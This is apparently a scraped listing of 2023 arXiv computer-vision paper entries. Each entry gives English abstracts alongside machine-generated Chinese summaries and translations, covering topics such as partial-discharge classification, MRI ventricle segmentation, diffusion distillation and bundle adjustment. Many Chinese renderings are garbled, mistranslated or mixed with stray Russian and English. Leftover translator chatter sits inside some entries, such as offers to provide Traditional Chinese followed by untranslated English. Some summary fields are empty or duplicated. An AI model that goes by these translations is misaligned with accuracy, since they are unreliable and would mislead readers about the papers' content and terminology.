扫描网络生成强大和稳定的层次图像描述符，不需要长时间训练，并且可以使用非常少的训练数据。然而，它们依赖于采样Scale维度，因此对于不同的Scale变化会变得敏感，无法泛化到未经训练的Scale。在这项工作中，我们定义了一种基于Riesz变换的特征表示方法。我们详细介绍了这种表示方法的数学基础，特别是它从Riesz变换继承了Scale相对 invariants属性，完全避免了采样Scale维度。此外，与扫描网络相比，我们的表示方法减少了特征数量的四倍。然而，我们的方法与扫描网络的性能相似，并且具有一个有趣的附加特点：Scale相对 invariants。我们的方法在 digit 分类任务中表现出色，即使用于训练 dataset 中的Scale四倍大的Scale也能保持稳定的准确率。作为第二个例子，我们考虑了 Texture 分类任务。Note: Simplified Chinese is used here, as it is the most widely used variety of Chinese in mainland China. However, if you prefer Traditional Chinese, I can also provide the translation.

Generalizable Classification of UHF Partial Discharge Signals in Gas-Insulated HVDC Systems Using Neural Networks

paper_url: http://arxiv.org/abs/2307.08466
repo_url: None
paper_authors: Steffen Seitz, Thomas Götz, Christopher Lindenberg, Ronald Tetzlaff, Stephan Schlegel
for: 本研究旨在提出一种基于神经网络的方法，用于分类HVDC GIS中的部分磁发（PD）信号，而不需要基于振荡序列分析特征。
methods: 本研究使用神经网络模型进行PD信号分类，并对时域和频域输入信号进行比较，以及不同Normalization方法的影响。
results: 研究结果表明，使用神经网络模型可以有效地分类PD信号，并且可以普适到不同的输入振荡频率和电压倍数。

Abstract
Undetected partial discharges (PDs) are a safety critical issue in high voltage (HV) gas insulated systems (GIS). While the diagnosis of PDs under AC voltage is well-established, the analysis of PDs under DC voltage remains an active research field. A key focus of these investigations is the classification of different PD sources to enable subsequent sophisticated analysis. In this paper, we propose and analyze a neural network-based approach for classifying PD signals caused by metallic protrusions and conductive particles on the insulator of HVDC GIS, without relying on pulse sequence analysis features. In contrast to previous approaches, our proposed model can discriminate the studied PD signals obtained at negative and positive potentials, while also generalizing to unseen operating voltage multiples. Additionally, we compare the performance of time- and frequency-domain input signals and explore the impact of different normalization schemes to mitigate the influence of free-space path loss between the sensor and defect location.

摘要
Undetected partial discharges (PDs) are a safety critical issue in high voltage (HV) gas insulated systems (GIS). While the diagnosis of PDs under AC voltage is well-established, the analysis of PDs under DC voltage remains an active research field. A key focus of these investigations is the classification of different PD sources to enable subsequent sophisticated analysis. In this paper, we propose and analyze a neural network-based approach for classifying PD signals caused by metallic protrusions and conductive particles on the insulator of HVDC GIS, without relying on pulse sequence analysis features. In contrast to previous approaches, our proposed model can discriminate the studied PD signals obtained at negative and positive potentials, while also generalizing to unseen operating voltage multiples. Additionally, we compare the performance of time- and frequency-domain input signals and explore the impact of different normalization schemes to mitigate the influence of free-space path loss between the sensor and defect location.Here's the translation in Traditional Chinese:Undetected partial discharges (PDs) are a safety critical issue in high voltage (HV) gas insulated systems (GIS). While the diagnosis of PDs under AC voltage is well-established, the analysis of PDs under DC voltage remains an active research field. A key focus of these investigations is the classification of different PD sources to enable subsequent sophisticated analysis. In this paper, we propose and analyze a neural network-based approach for classifying PD signals caused by metallic protrusions and conductive particles on the insulator of HVDC GIS, without relying on pulse sequence analysis features. In contrast to previous approaches, our proposed model can discriminate the studied PD signals obtained at negative and positive potentials, while also generalizing to unseen operating voltage multiples. Additionally, we compare the performance of time- and frequency-domain input signals and explore the impact of different normalization schemes to mitigate the influence of free-space path loss between the sensor and defect location.

Domain Adaptation using Silver Standard Masks for Lateral Ventricle Segmentation in FLAIR MRI

paper_url: http://arxiv.org/abs/2307.08456
repo_url: None
paper_authors: Owen Crystal, Pejman J. Maralani, Sandra Black, Alan R. Moody, April Khademi
for:This paper presents a new method for segmenting lateral ventricular volume (LVV) in fluid-attenuated inversion recovery (FLAIR) MRI images.methods:The proposed method uses transfer learning and domain adaptation to improve the accuracy of LVV segmentation. It uses a novel image processing algorithm to generate silver standard (SS) masks from the target domain, which are then used to supplement the gold standard (GS) data from the source domain.results:The proposed method achieved the best and most consistent performance on four different datasets, with a mean Dice similarity coefficient (DSC) of 0.89 and a coefficient of variation (CoV) of 0.05. The method significantly outperformed the GS-only model on three target domains, and the results suggest that pre-training with noisy labels from the target domain and fine-tuning with GS masks allows the model to adapt to the dataset-specific characteristics and provide robust parameter initialization.

Abstract
Lateral ventricular volume (LVV) is an important biomarker for clinical investigation. We present the first transfer learning-based LVV segmentation method for fluid-attenuated inversion recovery (FLAIR) MRI. To mitigate covariate shifts between source and target domains, this work proposes an domain adaptation method that optimizes performance on three target datasets. Silver standard (SS) masks were generated from the target domain using a novel conventional image processing ventricular segmentation algorithm and used to supplement the gold standard (GS) data from the source domain, Canadian Atherosclerosis Imaging Network (CAIN). Four models were tested on held-out test sets from four datasets: 1) SS+GS: trained on target SS masks and fine-tuned on source GS masks, 2) GS+SS: trained on source GS masks and fine-tuned on target SS masks, 3) trained on source GS (GS CAIN Only) and 4) trained on target SS masks (SS Only). The SS+GS model had the best and most consistent performance (mean DSC = 0.89, CoV = 0.05) and showed significantly (p < 0.05) higher DSC compared to the GS-only model on three target domains. Results suggest pre-training with noisy labels from the target domain allows the model to adapt to the dataset-specific characteristics and provides robust parameter initialization while fine-tuning with GS masks allows the model to learn detailed features. This method has wide application to other medical imaging problems where labeled data is scarce, and can be used as a per-dataset calibration method to accelerate wide-scale adoption.

摘要
“ lateral ventricular volume (LVV) 是一个重要的临床探险标的。本研究提出了首个基于传播学习的 LVV 分类方法，用于 fluido-attenuated inversion recovery (FLAIR) MRI。为了缓解对应领域的变化，这个工作提出了一个领域适应方法，将表达性提高到三个目标 dataset 上。silver standard (SS) mask 由目标领域中的一个新的传统影像处理方法生成，并用来补充来自源领域的 gold standard (GS) 数据，Canadian Atherosclerosis Imaging Network (CAIN)。我们测试了四个模型，分别是：1) SS+GS：在目标 SS masks 上练习并在源 GS masks 上精确化，2) GS+SS：在源 GS masks 上练习并在目标 SS masks 上精确化，3) 在源 GS (GS CAIN Only) 上练习，4) 在目标 SS masks (SS Only) 上练习。SS+GS 模型表现最好，其 mean DSC 为 0.89，CoV 为 0.05，并在三个目标领域中表现出最高的 DSC，并与 GS-only 模型在所有三个目标领域中有 statistically significant (p < 0.05) 的差异。结果显示，在目标领域的噪音标签上进行预训可以让模型适应到dataset-specific的特征，并提供了稳定的初始化，而精确化在目标 SS masks 上可以让模型学习更多的细部特征。这种方法可以广泛应用于医疗影像问题中，where labeled data 是稀有的，并可以用来加速广泛的采纳。”

Not All Steps are Created Equal: Selective Diffusion Distillation for Image Manipulation

paper_url: http://arxiv.org/abs/2307.08448
repo_url: https://github.com/andysonys/selective-diffusion-distillation
paper_authors: Luozhou Wang, Shuai Yang, Shu Liu, Ying-cong Chen
for: 提高图像修改任务中的精度和可修改性
methods: 提出了一种新的框架 Selective Diffusion Distillation (SDD)，通过训练一个Feedforward图像修改网络，以及一个有效的时间步选择器，使得图像修改任务中精度和可修改性同时得到提高。
results: 经验证明，该框架可以成功解决图像修改任务中的质量与可修改性之间的衡量问题，并且在多个任务上达到了优秀的效果。

Abstract
Conditional diffusion models have demonstrated impressive performance in image manipulation tasks. The general pipeline involves adding noise to the image and then denoising it. However, this method faces a trade-off problem: adding too much noise affects the fidelity of the image while adding too little affects its editability. This largely limits their practical applicability. In this paper, we propose a novel framework, Selective Diffusion Distillation (SDD), that ensures both the fidelity and editability of images. Instead of directly editing images with a diffusion model, we train a feedforward image manipulation network under the guidance of the diffusion model. Besides, we propose an effective indicator to select the semantic-related timestep to obtain the correct semantic guidance from the diffusion model. This approach successfully avoids the dilemma caused by the diffusion process. Our extensive experiments demonstrate the advantages of our framework. Code is released at https://github.com/AndysonYs/Selective-Diffusion-Distillation.

摘要
<>将文本翻译成简化中文。<>Conditional diffusion models 在图像修饰任务中表现出色。通常的管道包括在图像上添加噪声并 затем去噪。然而，这种方法面临一个负担选择问题：添加过多噪声会影响图像的准确性，而添加过少噪声则会影响图像的修饰性。这主要限制了它们的实际应用。在这篇论文中，我们提出了一个新的框架，选择性填充分离（SDD），以确保图像的准确性和修饰性。而不是直接使用扩散模型修饰图像，我们在扩散模型的指导下训练了一个Feedforward图像修饰网络。此外，我们提出了一个有效的指标选择 semantic相关的时间步骤，以获取正确的semantic指导从扩散模型。这种方法成功避免了扩散过程所导致的困难。我们的广泛实验表明了我们的框架的优势。代码发布在https://github.com/AndysonYs/Selective-Diffusion-Distillation。

DOT: A Distillation-Oriented Trainer

paper_url: http://arxiv.org/abs/2307.08436
repo_url: None
paper_authors: Borui Zhao, Quan Cui, Renjie Song, Jiajun Liang
for: 本研究旨在提高知识传播过程中学生模型的优化属性，以提高模型的泛化能力。
methods: 本研究使用了知识传播策略，并增加了精益损失来加速学生模型的优化。
results: 实验表明，使用 Distillation-Oriented Trainer (DOT) 可以破坏知识传播中的负面交互，并提高学生模型的泛化能力。 DOT 在 ImageNet-1k 上 Achieves a +2.59% accuracy improvement for the ResNet50-MobileNetV1 pair.

Abstract
Knowledge distillation transfers knowledge from a large model to a small one via task and distillation losses. In this paper, we observe a trade-off between task and distillation losses, i.e., introducing distillation loss limits the convergence of task loss. We believe that the trade-off results from the insufficient optimization of distillation loss. The reason is: The teacher has a lower task loss than the student, and a lower distillation loss drives the student more similar to the teacher, then a better-converged task loss could be obtained. To break the trade-off, we propose the Distillation-Oriented Trainer (DOT). DOT separately considers gradients of task and distillation losses, then applies a larger momentum to distillation loss to accelerate its optimization. We empirically prove that DOT breaks the trade-off, i.e., both losses are sufficiently optimized. Extensive experiments validate the superiority of DOT. Notably, DOT achieves a +2.59% accuracy improvement on ImageNet-1k for the ResNet50-MobileNetV1 pair. Conclusively, DOT greatly benefits the student's optimization properties in terms of loss convergence and model generalization. Code will be made publicly available.

摘要
知识塑化是将知识从大模型传递到小模型的过程，通过任务和塑化损失来实现。在这篇论文中，我们观察到任务损失和塑化损失之间存在负面关系，即在引入塑化损失时，任务损失的收敛被限制。我们认为这种负面关系的原因是塑化损失的优化不充分。理由是：教师模型的任务损失低于学生模型，且塑化损失驱动学生模型更加相似于教师模型，然后可以获得更好的任务损失收敛。为解决这种负面关系，我们提出了塑化导向训练器（DOT）。DOT分别考虑了任务和塑化损失的梯度，然后将塑化损失的梯度应用更大的滚动矩阵，以加速其优化。我们经验证明，DOT可以破坏这种负面关系，即任务损失和塑化损失都得到了足够的优化。广泛的实验证明了DOT的优越性。特别是，DOT在ImageNet-1k上为ResNet50-MobileNetV1对得到了+2.59%的准确率提升。结论是，DOT对学生模型的优化质量有着很大的改善，包括损失收敛和模型泛化。代码将公开发布。

Dense Affinity Matching for Few-Shot Segmentation

paper_url: http://arxiv.org/abs/2307.08434
repo_url: None
paper_authors: Hao Chen, Yonghan Dong, Zheming Lu, Yunlong Yu, Yingming Li, Jungong Han, Zhongfei Zhang
for: 这篇论文目的是提出一个几shot segmentation（FSS）方法，用于分类新的图像类型，只需要几个标注类别的数据。
methods: 这篇论文提出了一个紧密的相似性匹配（DAM）框架，通过密集的Pixel-to-Pixel和Pixel-to-Patch关系捕捉，以及对应的3D潜在神经网络，实现了支持-询问的互动。
results: 实验结果显示，DAM在十个benchmark上的性能很竞争，特别是在跨类、跨数据和跨领域的FSS任务中，仅需0.68M个parameters，表明DAM的效iveness和效率。

Abstract
Few-Shot Segmentation (FSS) aims to segment the novel class images with a few annotated samples. In this paper, we propose a dense affinity matching (DAM) framework to exploit the support-query interaction by densely capturing both the pixel-to-pixel and pixel-to-patch relations in each support-query pair with the bidirectional 3D convolutions. Different from the existing methods that remove the support background, we design a hysteretic spatial filtering module (HSFM) to filter the background-related query features and retain the foreground-related query features with the assistance of the support background, which is beneficial for eliminating interference objects in the query background. We comprehensively evaluate our DAM on ten benchmarks under cross-category, cross-dataset, and cross-domain FSS tasks. Experimental results demonstrate that DAM performs very competitively under different settings with only 0.68M parameters, especially under cross-domain FSS tasks, showing its effectiveness and efficiency.

摘要
几个示例图像分割（FSS）目标是将新类图像分割成几个示例图像。在这篇论文中，我们提出了密集相似匹配（DAM）框架，利用支持Query的互动来密集捕捉每个支持Query对的像素到像素和像素到补做的关系，使用双向三维卷积来实现。与现有方法不同的是，我们设计了一种弹性空间筛选模块（HSFM），用于筛选查询背景相关的特征，保留查询背景相关的特征，以帮助消除查询背景中的干扰对象。我们在十个benchmark上进行了广泛的评估，包括跨类、跨数据集和跨领域的FSS任务。实验结果表明，DAM在不同的设置下表现非常竞争力，特别是在跨领域FSS任务中，表明其效果和效率。

Divide&Classify: Fine-Grained Classification for City-Wide Visual Place Recognition

paper_url: http://arxiv.org/abs/2307.08417
repo_url: https://github.com/ga1i13o/Divide-and-Classify
paper_authors: Gabriele Trivigno, Gabriele Berton, Carlo Masone, Juan Aragon, Barbara Caputo
for: 本研究旨在解决Visual Place recognition问题，即图像检索问题。
methods: 本研究使用分类方法，而不是传统的相似性搜索方法，以减少计算时间。
results: 研究提出了一种新的分类方法，称为Divide&Classify（D&C），可以快速和准确地进行计算，并且与现有的检索方法结合使用可以提高计算速度。

Abstract
Visual Place recognition is commonly addressed as an image retrieval problem. However, retrieval methods are impractical to scale to large datasets, densely sampled from city-wide maps, since their dimension impact negatively on the inference time. Using approximate nearest neighbour search for retrieval helps to mitigate this issue, at the cost of a performance drop. In this paper we investigate whether we can effectively approach this task as a classification problem, thus bypassing the need for a similarity search. We find that existing classification methods for coarse, planet-wide localization are not suitable for the fine-grained and city-wide setting. This is largely due to how the dataset is split into classes, because these methods are designed to handle a sparse distribution of photos and as such do not consider the visual aliasing problem across neighbouring classes that naturally arises in dense scenarios. Thus, we propose a partitioning scheme that enables a fast and accurate inference, preserving a simple learning procedure, and a novel inference pipeline based on an ensemble of novel classifiers that uses the prototypes learned via an angular margin loss. Our method, Divide&Classify (D&C), enjoys the fast inference of classification solutions and an accuracy competitive with retrieval methods on the fine-grained, city-wide setting. Moreover, we show that D&C can be paired with existing retrieval pipelines to speed up computations by over 20 times while increasing their recall, leading to new state-of-the-art results.

摘要
通常情况下，视觉地点识别被视为一个图像检索问题。然而，检索方法在大量数据集上是不可行的，因为它们的维度会导致推断时间增加。使用近似最似 neighboor search 进行检索可以减轻这个问题，但是会导致性能下降。在这篇论文中，我们研究了是否可以通过将这个任务转化为一个分类问题，从而减少需要的相似性检索。我们发现现有的分类方法不适用于细致的城市范围内的地点识别任务，主要是因为数据集被分成的类别不适合处理稠密的场景中的视觉假设问题。因此，我们提出了一种分类方案，即 Divide&Classify (D&C)，它可以快速和准确地进行推断，同时保持简单的学习过程。此外，我们还提出了一种新的推断管线，基于一个 ensemble 的新分类器，使用学习 angular margin loss 的抽象。我们的方法 D&C 可以快速地进行分类，并且与现有的检索管线结合使用可以提高计算速度，从而实现新的领先结果。

Monocular 3D Object Detection with LiDAR Guided Semi Supervised Active Learning

paper_url: http://arxiv.org/abs/2307.08415
repo_url: None
paper_authors: Aral Hekimoglu, Michael Schmidt, Alvaro Marcos-Ramiro
for: 这个论文旨在提出一种基于 semi-supervised active learning 的精灵活的 LiDAR 引导的单目3D对象检测框架 (MonoLiG)，以利用收集的所有数据模式进行模型开发。
methods: 论文使用 LiDAR 作为指导，在训练单目3D检测器时不添加任何执行阶段的开销。在训练中，我们利用 LiDAR 教师和单目学生跨模态批处理法从 semi-supervised learning 中提取不标注数据中的信息作为 Pseudo-labels。
results: 我们的选择策略可以在 KITTI 和 Waymo 数据集上广泛地实现，并且在 state-of-the-art active learning 基础上减少标注成本至少 17%。我们的训练策略在 KITTI 3D 和 birds-eye-view (BEV) 单目对象检测官方 benchmark 中获得了前一名，提高了 BEV 平均准确率 (AP) 2.02。

Abstract
We propose a novel semi-supervised active learning (SSAL) framework for monocular 3D object detection with LiDAR guidance (MonoLiG), which leverages all modalities of collected data during model development. We utilize LiDAR to guide the data selection and training of monocular 3D detectors without introducing any overhead in the inference phase. During training, we leverage the LiDAR teacher, monocular student cross-modal framework from semi-supervised learning to distill information from unlabeled data as pseudo-labels. To handle the differences in sensor characteristics, we propose a data noise-based weighting mechanism to reduce the effect of propagating noise from LiDAR modality to monocular. For selecting which samples to label to improve the model performance, we propose a sensor consistency-based selection score that is also coherent with the training objective. Extensive experimental results on KITTI and Waymo datasets verify the effectiveness of our proposed framework. In particular, our selection strategy consistently outperforms state-of-the-art active learning baselines, yielding up to 17% better saving rate in labeling costs. Our training strategy attains the top place in KITTI 3D and birds-eye-view (BEV) monocular object detection official benchmarks by improving the BEV Average Precision (AP) by 2.02.

摘要
我们提出了一种新的半监督学习框架（SSAL），用于单目3D物体检测，利用了所有数据收集时的模式。我们使用激光准备数据选择和训练单目3D检测器，无需在检测阶段添加任何负担。在训练过程中，我们利用激光师，单目学生交叉模式自动学习法从无标签数据中提取信息，作为pseudo标签。为了处理感知器特征的差异，我们提议一种数据噪音基于权重机制，以减少激光模式噪音对单目检测器的影响。为选择需要标注的样本以提高模型性能，我们提议一种感知器一致性基于选择分数，与训练目标含义一致。我们的选择策略在KITTI和Waymo数据集上进行了广泛的实验，并证明了我们的提议的有效性。特别是，我们的选择策略在活动学习基elines上一直保持状态的最佳，可以在KITTI 3D和bird's-eye-view（BEV）单目物体检测官方benchmark中提高BEV均值精度（AP）by 2.02。

Active Learning for Object Detection with Non-Redundant Informative Sampling

paper_url: http://arxiv.org/abs/2307.08414
repo_url: None
paper_authors: Aral Hekimoglu, Adrian Brucker, Alper Kagan Kayali, Michael Schmidt, Alvaro Marcos-Ramiro
for: 提高2D对象检测器的性能，建立一个有代表性和多样性的数据集
methods: 使用不同样本之间的差异和不确定性来选择样本，并计算样本集中样本之间的信息共同分数
results: 比Random选择更高效，可以减少标注成本20%和30%，并且可以建立多样化的对象类型、形状和角度的数据集

Abstract
Curating an informative and representative dataset is essential for enhancing the performance of 2D object detectors. We present a novel active learning sampling strategy that addresses both the informativeness and diversity of the selections. Our strategy integrates uncertainty and diversity-based selection principles into a joint selection objective by measuring the collective information score of the selected samples. Specifically, our proposed NORIS algorithm quantifies the impact of training with a sample on the informativeness of other similar samples. By exclusively selecting samples that are simultaneously informative and distant from other highly informative samples, we effectively avoid redundancy while maintaining a high level of informativeness. Moreover, instead of utilizing whole image features to calculate distances between samples, we leverage features extracted from detected object regions within images to define object features. This allows us to construct a dataset encompassing diverse object types, shapes, and angles. Extensive experiments on object detection and image classification tasks demonstrate the effectiveness of our strategy over the state-of-the-art baselines. Specifically, our selection strategy achieves a 20% and 30% reduction in labeling costs compared to random selection for PASCAL-VOC and KITTI, respectively.

摘要
curating an informative and representative dataset is crucial for enhancing the performance of 2D object detectors. we present a novel active learning sampling strategy that addresses both the informativeness and diversity of the selections. our strategy integrates uncertainty and diversity-based selection principles into a joint selection objective by measuring the collective information score of the selected samples. specifically, our proposed NORIS algorithm quantifies the impact of training with a sample on the informativeness of other similar samples. by exclusively selecting samples that are simultaneously informative and distant from other highly informative samples, we effectively avoid redundancy while maintaining a high level of informativeness. moreover, instead of utilizing whole image features to calculate distances between samples, we leverage features extracted from detected object regions within images to define object features. this allows us to construct a dataset encompassing diverse object types, shapes, and angles. extensive experiments on object detection and image classification tasks demonstrate the effectiveness of our strategy over the state-of-the-art baselines. specifically, our selection strategy achieves a 20% and 30% reduction in labeling costs compared to random selection for PASCAL-VOC and KITTI, respectively.

CLIP-Guided StyleGAN Inversion for Text-Driven Real Image Editing

paper_url: http://arxiv.org/abs/2307.08397
repo_url: https://github.com/johnberg1/CLIPInverter
paper_authors: Ahmet Canberk Baykal, Abdul Basit Anees, Duygu Ceylan, Erkut Erdem, Aykut Erdem, Deniz Yuret
for: 用于实现基于自然语言描述的图像编辑
methods: 使用 StyleGAN 模型和 CLIP embedding 进行图像编辑，并使用 novel 的文本条件 adapter 层来实现多属性变化
results: 比其他方法更高效和精准地完成多属性变化，并且在不同领域（人脸、猫、鸟等）表现出更高的推理精度和图像真实性

Abstract
Researchers have recently begun exploring the use of StyleGAN-based models for real image editing. One particularly interesting application is using natural language descriptions to guide the editing process. Existing approaches for editing images using language either resort to instance-level latent code optimization or map predefined text prompts to some editing directions in the latent space. However, these approaches have inherent limitations. The former is not very efficient, while the latter often struggles to effectively handle multi-attribute changes. To address these weaknesses, we present CLIPInverter, a new text-driven image editing approach that is able to efficiently and reliably perform multi-attribute changes. The core of our method is the use of novel, lightweight text-conditioned adapter layers integrated into pretrained GAN-inversion networks. We demonstrate that by conditioning the initial inversion step on the CLIP embedding of the target description, we are able to obtain more successful edit directions. Additionally, we use a CLIP-guided refinement step to make corrections in the resulting residual latent codes, which further improves the alignment with the text prompt. Our method outperforms competing approaches in terms of manipulation accuracy and photo-realism on various domains including human faces, cats, and birds, as shown by our qualitative and quantitative results.

摘要

Revisiting Scene Text Recognition: A Data Perspective

paper_url: http://arxiv.org/abs/2307.08723
repo_url: https://github.com/Mountchicken/Union14M
paper_authors: Qing Jiang, Jiapeng Wang, Dezhi Peng, Chongyu Liu, Lianwen Jin
for: 本研究旨在从数据驱动的角度重新评估场景文本识别（STR）。
methods: 我们首先回顾了场景文本识别领域的六个常用标准 benchmark，并发现了性能饱和现象，即仅有2.91%的标准图像无法由13种表征模型准确识别。
results: 我们的实验表明，13种模型在400万个标注图像上的平均准确率只有66.53%， indicating that STR still faces numerous challenges in real-world scenarios。

Abstract
This paper aims to re-assess scene text recognition (STR) from a data-oriented perspective. We begin by revisiting the six commonly used benchmarks in STR and observe a trend of performance saturation, whereby only 2.91% of the benchmark images cannot be accurately recognized by an ensemble of 13 representative models. While these results are impressive and suggest that STR could be considered solved, however, we argue that this is primarily due to the less challenging nature of the common benchmarks, thus concealing the underlying issues that STR faces. To this end, we consolidate a large-scale real STR dataset, namely Union14M, which comprises 4 million labeled images and 10 million unlabeled images, to assess the performance of STR models in more complex real-world scenarios. Our experiments demonstrate that the 13 models can only achieve an average accuracy of 66.53% on the 4 million labeled images, indicating that STR still faces numerous challenges in the real world. By analyzing the error patterns of the 13 models, we identify seven open challenges in STR and develop a challenge-driven benchmark consisting of eight distinct subsets to facilitate further progress in the field. Our exploration demonstrates that STR is far from being solved and leveraging data may be a promising solution. In this regard, we find that utilizing the 10 million unlabeled images through self-supervised pre-training can significantly improve the robustness of STR model in real-world scenarios and leads to state-of-the-art performance.

摘要
Translated into Simplified Chinese:这篇论文旨在从数据驱动的角度重新评估场景文本识别（STR）。我们开始是查看常用的六个STR benchmark，并观察到表现饱和的趋势，只有2.91%的benchmark图像无法被13种代表性模型准确地识别。虽然这些结果吸引人并建议STR可以被视为解决的，但我们认为这主要归结于常用的benchmark图像的更容易识别性，因此隐藏STR实际面临的问题。为此，我们整合了大规模的实际STR数据集，即Union14M，该数据集包括400万标注图像和1000万无标注图像，以评估STR模型在更复杂的实际场景中的性能。我们的实验表明，13种模型只能在400万标注图像上 achieve an average accuracy of 66.53%，表明STR在实际场景中仍面临许多挑战。通过分析13种模型的错误模式，我们确定了七个STR中的开放挑战，并开发了一个基于这些挑战的挑战驱动benchmark，包括八个不同的子集，以促进STR领域的进一步进步。我们的探索表明，STR远未被解决，并且利用数据可能是一个有希望的解决方案。在这种情况下，我们发现通过对1000万无标注图像进行自主学习预训练可以在实际场景中显著改善STR模型的Robustness，并达到状态的最佳性能。

Dynamic Snake Convolution based on Topological Geometric Constraints for Tubular Structure Segmentation

paper_url: http://arxiv.org/abs/2307.08388
repo_url: https://github.com/yaoleiqi/dscnet
paper_authors: Yaolei Qi, Yuting He, Xiaoming Qi, Yuan Zhang, Guanyu Yang
for: 这种研究旨在提高 tubular 结构 segmentation 任务中的准确性和效率，这些结构包括血管和道路等。methods: 该研究使用了动态蛇卷 convolution 技术来正确地捕捉 tubular 结构的特征，并提出了多视角特征融合策略以保持多种全球形态的重要信息。results: 实验表明，使用 DSCNet 可以在 2D 和 3D 数据集上提供更高的准确性和连续性，比较常见的方法更好。

Abstract
Accurate segmentation of topological tubular structures, such as blood vessels and roads, is crucial in various fields, ensuring accuracy and efficiency in downstream tasks. However, many factors complicate the task, including thin local structures and variable global morphologies. In this work, we note the specificity of tubular structures and use this knowledge to guide our DSCNet to simultaneously enhance perception in three stages: feature extraction, feature fusion, and loss constraint. First, we propose a dynamic snake convolution to accurately capture the features of tubular structures by adaptively focusing on slender and tortuous local structures. Subsequently, we propose a multi-view feature fusion strategy to complement the attention to features from multiple perspectives during feature fusion, ensuring the retention of important information from different global morphologies. Finally, a continuity constraint loss function, based on persistent homology, is proposed to constrain the topological continuity of the segmentation better. Experiments on 2D and 3D datasets show that our DSCNet provides better accuracy and continuity on the tubular structure segmentation task compared with several methods. Our codes will be publicly available.

摘要
Accurate segmentation of topological tubular structures, such as blood vessels and roads, is crucial in various fields, ensuring accuracy and efficiency in downstream tasks. However, many factors complicate the task, including thin local structures and variable global morphologies. In this work, we note the specificity of tubular structures and use this knowledge to guide our DSCNet to simultaneously enhance perception in three stages: feature extraction, feature fusion, and loss constraint. First, we propose a dynamic snake convolution to accurately capture the features of tubular structures by adaptively focusing on slender and tortuous local structures. Subsequently, we propose a multi-view feature fusion strategy to complement the attention to features from multiple perspectives during feature fusion, ensuring the retention of important information from different global morphologies. Finally, a continuity constraint loss function, based on persistent homology, is proposed to constrain the topological continuity of the segmentation better. Experiments on 2D and 3D datasets show that our DSCNet provides better accuracy and continuity on the tubular structure segmentation task compared with several methods. Our codes will be publicly available.Here's the translation in Traditional Chinese as well:同样，精确的分类 tubular structures, such as blood vessels and roads, 在多个领域是重要的，以确保下游任务的精度和效率。然而，多个因素会复杂这个任务，包括细部本地结构和变化的全球形态。在这个工作中，我们注意到 tubular structures 的特有性，并将这些知识用于导引我们的 DSCNet，以同时增强特性在三个阶段：特征提取、特征融合和损失约束。首先，我们提出了动态蛇条件，以精确地捕捉 tubular structures 的特征，并适应细长和迂回的本地结构。接着，我们提出了多观点特征融合策略，以补充多个观点的特征，以确保保留不同全球形态中的重要信息。最后，我们提出了基于 persistent homology 的连续约束损失函数，以更好地限制分类的topological continuity。实验结果显示，我们的 DSCNet 在 tubular structure 分类任务中提供了更好的精度和连续性，较于多种方法。我们的代码将会公开。

Distributed bundle adjustment with block-based sparse matrix compression for super large scale datasets

paper_url: http://arxiv.org/abs/2307.08383
repo_url: https://github.com/MozartZheng/DistributedBA
paper_authors: Maoteng Zheng, Nengcheng Chen, Junfeng Zhu, Xiaoru Zeng, Huanbin Qiu, Yuyao Jiang, Xingyue Lu, Hao Qu
for: 这篇论文主要是为了解决大规模数据集中的摄像头系统Bundle Adjustment（BA）问题。
methods: 该方法使用精确的Levenberg-Marquardt（LM）算法来实现分布式摄像头系统（DBA），而不是使用估计算法来适应平行框架。它还使用块基于稀疏矩阵压缩格式（BSMC）来压缩大规模的摄像头系统（RCS），以便分布式存储和更新。
results: 经过评估和比较，该方法在各种数据集上显示了高效的内存使用和广泛的可扩展性，比基eline上的方法更高效。首次在实际数据集上实现了平行BA使用LM算法，处理118万张图像和1000万张图像（相对于状态艺术LPM-based BA的500倍）。

Abstract
We propose a distributed bundle adjustment (DBA) method using the exact Levenberg-Marquardt (LM) algorithm for super large-scale datasets. Most of the existing methods partition the global map to small ones and conduct bundle adjustment in the submaps. In order to fit the parallel framework, they use approximate solutions instead of the LM algorithm. However, those methods often give sub-optimal results. Different from them, we utilize the exact LM algorithm to conduct global bundle adjustment where the formation of the reduced camera system (RCS) is actually parallelized and executed in a distributed way. To store the large RCS, we compress it with a block-based sparse matrix compression format (BSMC), which fully exploits its block feature. The BSMC format also enables the distributed storage and updating of the global RCS. The proposed method is extensively evaluated and compared with the state-of-the-art pipelines using both synthetic and real datasets. Preliminary results demonstrate the efficient memory usage and vast scalability of the proposed method compared with the baselines. For the first time, we conducted parallel bundle adjustment using LM algorithm on a real datasets with 1.18 million images and a synthetic dataset with 10 million images (about 500 times that of the state-of-the-art LM-based BA) on a distributed computing system.

摘要
我们提议一种分布式束适应（DBA）方法，使用精确的Levenberg-Marquardt（LM）算法进行超大规模数据集处理。现有的方法通常将全球地图分割成小地图，并在子地图中进行束适应。为适应并行框架，它们通常使用估计而不是LM算法。然而，这些方法通常会给出低于优化的结果。与之不同的是，我们利用精确的LM算法来进行全球束适应，并将Camera系统的减少（RCS）实际上并行并在分布式环境中执行。为存储大RCS，我们使用块基本稀疏矩阵压缩格式（BSMC），这种格式充分利用了块特点。BSMC格式还允许分布式存储和更新全球RCS。我们提出的方法与现有的管道进行了广泛的评估和比较，使用了真实和 sintetic 数据集。初步结果表明我们的方法具有高效的内存使用和广泛的扩展性，与基eline相比。此外，我们首次在真实数据集上进行了并行束适应，使用LM算法，并处理1.18万张图像和10万张图像（约500倍于现有LM基于BA的状态）在分布式计算系统上。

Self-supervised Monocular Depth Estimation: Let’s Talk About The Weather

paper_url: http://arxiv.org/abs/2307.08357
repo_url: https://github.com/kieran514/robustdepth
paper_authors: Kieran Saunders, George Vogiatzis, Luis Manso
for:这篇论文旨在提出一种 Pseudo-supervised 方法，使得自助学习深度估计模型能够在不同天气和光照条件下进行高性能的估计。methods:该方法使用计算机图形和生成模型来对现有的晴天数据进行数据增强，以模拟不利天气效果。此外，该方法还使用 Pseudo-supervised 损失函数，以提高depth和pose估计的性能。results:测试结果表明，该方法（Robust-Depth）在 KITTI 数据集上达到了 State-of-the-Art 性能，而在具有困难天气条件的数据集上，如 DrivingStereo、Foggy CityScape 和 NuScenes-Night，则有 significanly 高的性能。

Abstract
